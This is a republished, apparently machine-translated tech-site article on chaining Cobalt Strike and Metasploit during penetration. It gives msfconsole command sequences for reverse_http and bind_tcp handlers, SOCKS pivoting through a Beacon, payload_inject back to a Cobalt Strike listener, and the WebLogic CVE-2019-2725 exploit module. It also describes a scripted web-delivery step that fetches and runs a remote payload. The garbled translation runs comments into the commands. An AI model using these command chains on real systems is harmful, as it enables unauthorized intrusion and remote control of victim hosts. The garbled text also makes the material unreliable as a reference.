Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an example analysis of the linkage between CobaltStrike and Metasploit. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Identify Ms08067

Personally, I feel that CobaltStrike's graphical interface and rich functions are a super post-penetration framework, especially convenient to manage all kinds of data and shell collected in the process of horizontal movement, but it is very weak for vulnerability exploitation and initial breakthrough. On the other hand, Metasploit as a vulnerability exploitation framework, EXP and its smooth, a variety of modules, including scanning, breakthrough, expansion of one-stop services, but for the management of multiple shell appears to be a bit weak (after all, there is no graphical interface, too many commands can not remember). Therefore, how to link the two frameworks effectively has become the knowledge that we want to learn today.

First, using CS to serve MSF

Use CS's Beacon to derive a shell to MSF to perform subsequent penetration tasks:

Configure snooping in MSF

# configure listener msf > use exploit/multi/handler# Select payloadmsf > windows/meterpreter/reverse_httpmsf > set lhost IPmsf > set lport port# launch listener msf > set ExitOnSession Falsemsf > run-jz

Set up an external listener Foreign HTTP (or Foreign HTTPS) in CS

Select the target you want to derive, right-click the spawn feature, select the listener you just created, and you can receive a return connection in MSF.

Use CS to provide forwarding or proxy functions for MSF for subsequent detection and vulnerability exploitation:

Use Beacon to set up a socks agent:

Enter the socks listening port in Beacon, or right-click to use it as the destination for forwarding. Select SOCKS Server in pivoting, configure the listening port and click

Launch activated.

You can see the established transponder in view-> Proxy Pivots. Click Tunnel to get the forwarding command of MSF.

Copy to MSF and set the agent and load type

Using CVE-2019-2725 as the test target machine

# set proxy msf > setg Proxies socks4:127.0.0.1:36725# configure payload. Because the host in isolated network segment cannot be directly connected back to MSF, it needs to be replaced with passively connected bind type payload msf > set payload windows/meterpreter/bind_tcpmsf > run

2. MSF serves CS

The main thing is to use the EXP of the MSF framework to obtain the Beacon of CS.

A command execution Shell was obtained:

This is the simplest and most common case, and not all EXP can bounce back a Meterpreter session.

Deploy a Payload distribution site in CS using Attacks-> Web Drive-by-> Scripted Web Delivery:

Configure the listener and URL path, and the corresponding command prompt will pop up after startup

After copying the command, you can execute it directly in the shell of MSF

After the command is executed, the MSF session will be stuck, and you can kill it directly without affecting the CS session.

A Meterpreter session was obtained:

After obtaining the meterpreter session, use the MSF injection function to load the payload of Cs

# suspend meterpreter session meterpreter > background# enter payload_inject module msf > use exploit/windows/local/payload_inject# Select the corresponding payload (http or https) msf > set payload windows/meterpreter/reverse_http# set the connection address (CS listener address) msf > set LHOST CS_IPmsf > set LPORT CS_PORT# specify the meterpreter session msf > set session meterpreter session ID# to be executed MSF does not start listening (otherwise msf will prompt the execution is successful But there is no session establishment, and CS will not receive the session) msf > set disablepayloadhandler true msf > run

In the process, it is found that this method can only inject 32-bit payload, if 64-bit payload is injected, the target process will crash, and 32-bit payload can not be injected into 64-bit programs. The reason for the crash is: APPCRASH (fault module StackHash_af76), even if you get system permissions and close UAC, it still won't work. If you do not set pid, a 32-bit notepad.exe process will be created. Remember to migrate the CS session process in time after a successful connection.

Directly bounce back to CS:

Directly request and load the payload of CS during MSF exploit, which is basically the same as the second method (test vulnerability is CVE-2019-2725)

# Select the corresponding payloadmsf6 exploit (multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_http # according to the type of CS listener, set the backconnection address (CS listener address) msf6 exploit (multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST CS_IPmsf6 exploit (multi/misc/weblogic_deserialize_asyncresponseservice) > set LPORT CS_PORT# specify the meterpreter session msf6 exploit (multi/misc/weblogic_deserialize_asyncresponseservice) > set session meterpreter will Then ID# sets MSF not to start snooping (otherwise msf will indicate that the execution is successful But there is no session establishment, and CS will not receive the session) msf6 exploit (multi/misc/weblogic_deserialize_asyncresponseservice) > set disablepayloadhandler true

In fact, it is the same as the second operation, which is to call the module of MSF and configure the parameters of payload. After successful exploitation, the vulnerability is directly through the windowless powershell.

Return to the CS session and the target host does not have a window to pop up. The 64-bit payload cannot be loaded during testing, which may be the reason why a 32-bit cmd.exe is launched after this vulnerability is exploited to execute subsequent commands.

3.

At first, I planned to take a study note. after all, a good memory is not as good as a bad note. if what I have read has not been used for a long time, it may be forgotten, and it is also convenient to leave a memo for future inquiry. However, after that, it was a process of climbing the pit, and I thought I was so smart. "the names of these two loads seem to be, and they are not mentioned in the article, so can they also be linked?" Because the methods introduced on the Internet (Chinese articles) are basically the same as the official guidelines released by CS in 2016, but I think there are more than three types of Listener in CS at present.

Http and https

Dns smb tcp

There are also things in MSF such as

Windows/meterpreter/reverse_tcp_dnswindows/meterpreter/bind_named_pipe windows/meterpreter/reverse_tcp

After a test of this kind of payload module, which looks a lot like it, only the http and https payloads can receive a session returned by the other party. Sure enough, I am still too young, no one mentioned it, it is really because it is not used in this way, after all, the two frameworks are independent from the beginning, so it is a face that there is a way to connect between mature frameworks. You shouldn't ask for too much in the first place.

The above is the analysis of the example of CobaltStrike and Metasploit linkage shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.